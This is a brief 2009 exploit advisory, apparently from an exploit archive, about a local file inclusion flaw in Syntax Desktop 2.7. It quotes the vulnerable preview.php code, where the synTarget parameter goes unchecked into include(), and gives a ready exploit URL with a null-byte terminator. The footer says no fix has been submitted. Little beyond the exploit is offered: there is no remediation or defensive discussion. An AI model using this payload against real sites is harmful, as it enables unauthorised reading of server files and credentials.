Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability

2009-02-04 09:39:39

-----------------:local File Include:-----------------
-------------------------------------------------------
script: syntax-desktop 2-7

------------------------------------------------------------------
download from:http://downloads.sourceforge.net/syntax-desktop/syntax-desktop-2-7.zip?modtime=1215600196&big_mirror=0


------------------------------------------------------------------
........................................................
vul: /admin/modules/aa/preview.php

line 42 $target=$_GET["synTarget"];
ob_start();
line 44 include("../../../$target");

-----------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/path/admin/modules/aa/preview.php?synTarget=[Lfi]%00


***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [[email protected]]
---------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.